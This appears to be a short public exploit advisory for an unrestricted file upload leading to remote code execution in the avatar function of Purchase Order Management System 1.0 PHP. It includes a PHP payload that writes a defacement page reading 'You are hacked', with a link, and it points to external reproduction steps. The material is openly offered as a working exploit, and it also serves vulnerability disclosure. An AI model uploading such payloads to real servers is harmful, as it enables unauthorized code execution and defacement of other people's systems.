## Title: Purchase-Order-Management-System-1.0 File-Upload-RCE ## Author: nu11secur1ty ## Date: 12/14/2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-103796 ## Reference: https://portswigger.net/web-security/file-upload ## Description: The parameter custom-file-label in the avatar function is vulnerable to the File Upload vulnerability. The function is not sanitizing correctly, and the attacker can upload any extension of files on this system after this, he can execute it directly on the server using Curl protocol, web browser, etc.! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ``` <?php // @nu11secur1ty 2023 $myfile = fopen("hacked.html", "w") or die("Unable to open file!"); $txt = "<p>You are hacked</p>\n"; fwrite($myfile, $txt); $txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>You can visit our website for more information!</a></p>\n"; fwrite($myfile, $txt); fclose($myfile); ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-System-1.0/Purchase-Order-Management-System-1.0-File-Upload-RCE) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/purchase-order-management-system-10_11.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>